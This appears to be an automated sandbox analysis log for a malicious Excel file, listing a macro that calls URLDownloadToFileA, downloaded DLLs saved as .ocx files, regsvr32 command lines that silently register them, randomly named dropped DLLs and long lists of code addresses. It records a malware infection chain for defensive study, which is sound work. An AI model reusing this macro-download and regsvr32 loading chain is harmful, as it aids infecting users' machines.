Source: DETAILS 25922194612.xls Macro extractor: Sheet: PKEKPPGEKKPGE contains: URLDownloadToFileA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr3.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr2.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr4.ocx
Source: DETAILS 25922194612.xls Initial sample: EXEC
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\system32\KuSAkvGE\
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180017710 4_2_0000000180017710
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180003D18 4_2_0000000180003D18
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018002191C 4_2_000000018002191C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180016320 4_2_0000000180016320
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001D128 4_2_000000018001D128
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000D12C 4_2_000000018000D12C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180014930 4_2_0000000180014930
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180008534 4_2_0000000180008534
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000C740 4_2_000000018000C740
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180020F44 4_2_0000000180020F44
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001CD44 4_2_000000018001CD44
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180023B48 4_2_0000000180023B48
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000B948 4_2_000000018000B948
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180021754 4_2_0000000180021754
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180022358 4_2_0000000180022358
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180029F5C 4_2_0000000180029F5C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000796C 4_2_000000018000796C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001BF70 4_2_000000018001BF70
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180025374 4_2_0000000180025374
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180007F74 4_2_0000000180007F74
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180021F7C 4_2_0000000180021F7C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180019788 4_2_0000000180019788
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180001B8C 4_2_0000000180001B8C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180028D94 4_2_0000000180028D94
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180028394 4_2_0000000180028394
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180013B94 4_2_0000000180013B94
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001479C 4_2_000000018001479C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000E7A0 4_2_000000018000E7A0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800087A4 4_2_00000001800087A4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180017BA8 4_2_0000000180017BA8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000EBAC 4_2_000000018000EBAC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180012BB8 4_2_0000000180012BB8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001B3B8 4_2_000000018001B3B8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800171B8 4_2_00000001800171B8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180018DBC 4_2_0000000180018DBC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800257C0 4_2_00000001800257C0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180008BC0 4_2_0000000180008BC0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800117C4 4_2_00000001800117C4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800141C8 4_2_00000001800141C8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018002B1D4 4_2_000000018002B1D4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180023DDC 4_2_0000000180023DDC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800227E0 4_2_00000001800227E0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000007FEF75312B0 5_2_000007FEF75312B0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000007FEF753443C 5_2_000007FEF753443C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000007FEF75353FB 5_2_000007FEF75353FB
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000007FEF7534A70 5_2_000007FEF7534A70
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000007FEF7535E01 5_2_000007FEF7535E01
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000007FEF7535CAD 5_2_000007FEF7535CAD
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000007FEF7536850 5_2_000007FEF7536850
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00140000 5_2_00140000
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180026410 5_2_0000000180026410
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180025C30 5_2_0000000180025C30
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180001D58 5_2_0000000180001D58
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180011E5C 5_2_0000000180011E5C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018002C6C8 5_2_000000018002C6C8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018002C2C8 5_2_000000018002C2C8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180026F14 5_2_0000000180026F14
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180016320 5_2_0000000180016320
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180001378 5_2_0000000180001378
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180018FE8 5_2_0000000180018FE8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001ABE8 5_2_000000018001ABE8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800243F4 5_2_00000001800243F4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800083F8 5_2_00000001800083F8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800247FC 5_2_00000001800247FC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001DBFC 5_2_000000018001DBFC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001100C 5_2_000000018001100C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180027C28 5_2_0000000180027C28
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018002143C 5_2_000000018002143C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001303C 5_2_000000018001303C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018002A840 5_2_000000018002A840
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180003840 5_2_0000000180003840
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000B444 5_2_000000018000B444
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000F048 5_2_000000018000F048
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018002AC4C 5_2_000000018002AC4C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180010050 5_2_0000000180010050
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180003050 5_2_0000000180003050
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000445C 5_2_000000018000445C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000C85C 5_2_000000018000C85C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180003460 5_2_0000000180003460
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180029C6C 5_2_0000000180029C6C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001586C 5_2_000000018001586C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000406C 5_2_000000018000406C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000E06C 5_2_000000018000E06C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000BC70 5_2_000000018000BC70
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001447C 5_2_000000018001447C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180026C80 5_2_0000000180026C80
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180010C84 5_2_0000000180010C84
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180016088 5_2_0000000180016088
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180002888 5_2_0000000180002888
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180017C8C 5_2_0000000180017C8C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000FC8C 5_2_000000018000FC8C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018002D098 5_2_000000018002D098
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800154B8 5_2_00000001800154B8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180011CCC 5_2_0000000180011CCC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800064D0 5_2_00000001800064D0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800180D4 5_2_00000001800180D4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800054D8 5_2_00000001800054D8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018002CCE0 5_2_000000018002CCE0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800254E4 5_2_00000001800254E4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800184E8 5_2_00000001800184E8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800010E8 5_2_00000001800010E8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000E8F0 5_2_000000018000E8F0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018002A0F8 5_2_000000018002A0F8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180019900 5_2_0000000180019900
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180011904 5_2_0000000180011904
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001F908 5_2_000000018001F908
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018002490C 5_2_000000018002490C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001890C 5_2_000000018001890C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001D510 5_2_000000018001D510
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180003D18 5_2_0000000180003D18
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018002191C 5_2_000000018002191C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001D128 5_2_000000018001D128
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000D12C 5_2_000000018000D12C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180014930 5_2_0000000180014930
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180008534 5_2_0000000180008534
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001CD44 5_2_000000018001CD44
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000B948 5_2_000000018000B948
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000796C 5_2_000000018000796C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180010590 5_2_0000000180010590
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180028D94 5_2_0000000180028D94
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800091A8 5_2_00000001800091A8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800171B8 5_2_00000001800171B8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180018DBC 5_2_0000000180018DBC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800141C8 5_2_00000001800141C8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018002B1D4 5_2_000000018002B1D4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180023DDC 5_2_0000000180023DDC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800165E4 5_2_00000001800165E4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180029DF0 5_2_0000000180029DF0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180015DF4 5_2_0000000180015DF4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800011F4 5_2_00000001800011F4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000FE08 5_2_000000018000FE08
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180027E14 5_2_0000000180027E14
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000B618 5_2_000000018000B618
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180023220 5_2_0000000180023220
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180020A34 5_2_0000000180020A34
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180007634 5_2_0000000180007634
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180022E38 5_2_0000000180022E38
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000E638 5_2_000000018000E638
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180010250 5_2_0000000180010250
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180026A64 5_2_0000000180026A64
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180004264 5_2_0000000180004264
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180013674 5_2_0000000180013674
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000F678 5_2_000000018000F678
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000E278 5_2_000000018000E278
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180005E7C 5_2_0000000180005E7C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180025E88 5_2_0000000180025E88
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018002868C 5_2_000000018002868C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180014E98 5_2_0000000180014E98
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180014AA4 5_2_0000000180014AA4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800126A8 5_2_00000001800126A8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800036A8 5_2_00000001800036A8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018002A6BC 5_2_000000018002A6BC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001CABC 5_2_000000018001CABC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000EAC0 5_2_000000018000EAC0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001B6D4 5_2_000000018001B6D4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000F2DC 5_2_000000018000F2DC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800202E0 5_2_00000001800202E0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800226E0 5_2_00000001800226E0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180019AF0 5_2_0000000180019AF0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000BEF0 5_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180012EF8 5_2_0000000180012EF8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180029710 5_2_0000000180029710
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180017710 5_2_0000000180017710
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000C740 5_2_000000018000C740
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180020F44 5_2_0000000180020F44
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180023B48 5_2_0000000180023B48
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180023748 5_2_0000000180023748
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180021754 5_2_0000000180021754
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180022358 5_2_0000000180022358
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180029F5C 5_2_0000000180029F5C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018002B368 5_2_000000018002B368
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001BF70 5_2_000000018001BF70
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180025374 5_2_0000000180025374
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180007F74 5_2_0000000180007F74
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180021F7C 5_2_0000000180021F7C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180019788 5_2_0000000180019788
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180001B8C 5_2_0000000180001B8C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180028394 5_2_0000000180028394
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180013B94 5_2_0000000180013B94
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001479C 5_2_000000018001479C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000E7A0 5_2_000000018000E7A0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800087A4 5_2_00000001800087A4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180017BA8 5_2_0000000180017BA8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000EBAC 5_2_000000018000EBAC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001B3B8 5_2_000000018001B3B8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180012BB8 5_2_0000000180012BB8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800257C0 5_2_00000001800257C0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180008BC0 5_2_0000000180008BC0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800117C4 5_2_00000001800117C4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800227E0 5_2_00000001800227E0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_002B0000 7_2_002B0000
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800083F8 7_2_00000001800083F8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180026410 7_2_0000000180026410
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000680F 7_2_000000018000680F
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180025C30 7_2_0000000180025C30
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180013674 7_2_0000000180013674
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180017C8C 7_2_0000000180017C8C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000A48C 7_2_000000018000A48C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000BEF0 7_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180029710 7_2_0000000180029710
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180026F14 7_2_0000000180026F14
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180023748 7_2_0000000180023748
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180001D58 7_2_0000000180001D58
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018002B368 7_2_000000018002B368
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180001378 7_2_0000000180001378
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180010590 7_2_0000000180010590
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800091A8 7_2_00000001800091A8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800165E4 7_2_00000001800165E4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180018FE8 7_2_0000000180018FE8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001ABE8 7_2_000000018001ABE8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180029DF0 7_2_0000000180029DF0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800243F4 7_2_00000001800243F4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180015DF4 7_2_0000000180015DF4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800011F4 7_2_00000001800011F4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800247FC 7_2_00000001800247FC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001DBFC 7_2_000000018001DBFC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000FE08 7_2_000000018000FE08
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001100C 7_2_000000018001100C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180027E14 7_2_0000000180027E14
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000B618 7_2_000000018000B618
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180023220 7_2_0000000180023220
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180027C28 7_2_0000000180027C28
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180020A34 7_2_0000000180020A34
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180007634 7_2_0000000180007634
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180022E38 7_2_0000000180022E38
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000E638 7_2_000000018000E638
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018002143C 7_2_000000018002143C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001303C 7_2_000000018001303C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018002A840 7_2_000000018002A840
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180003840 7_2_0000000180003840
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000B444 7_2_000000018000B444
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000F048 7_2_000000018000F048
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018002AC4C 7_2_000000018002AC4C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180010050 7_2_0000000180010050
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180010250 7_2_0000000180010250
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180003050 7_2_0000000180003050
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180011E5C 7_2_0000000180011E5C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000445C 7_2_000000018000445C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000C85C 7_2_000000018000C85C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180003460 7_2_0000000180003460
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180026A64 7_2_0000000180026A64
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180004264 7_2_0000000180004264
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180029C6C 7_2_0000000180029C6C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001586C 7_2_000000018001586C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000406C 7_2_000000018000406C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000E06C 7_2_000000018000E06C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000BC70 7_2_000000018000BC70
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000F678 7_2_000000018000F678
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000E278 7_2_000000018000E278
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001447C 7_2_000000018001447C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180005E7C 7_2_0000000180005E7C
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF74DBD70 appears 113 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF753BD70 appears 113 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF70C7FF0 appears 31 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF74D7FF0 appears 31 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF9D2B3B0 appears 148 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF70CBD70 appears 113 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF7537FF0 appears 31 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 00000001800153F4 appears 48 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF9D27FF0 appears 31 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF74DB3B0 appears 148 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF753B3B0 appears 148 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF9D2BD70 appears 113 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF70CB3B0 appears 148 times
Source: DETAILS 25922194612.xls Macro extractor: Sheet name: PKEKPPGEKKPGE
Source: DETAILS 25922194612.xls ReversingLabs: Detection: 41%
Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KuSAkvGE\rWFJGQNl.dll"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\Ejpzh\qlDqXeGagKnBKzd.dll"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FiPeSYwmr\Wuiko.dll"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PLVmoWLosZJQb\bTjwWDTWvnC.dll"
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
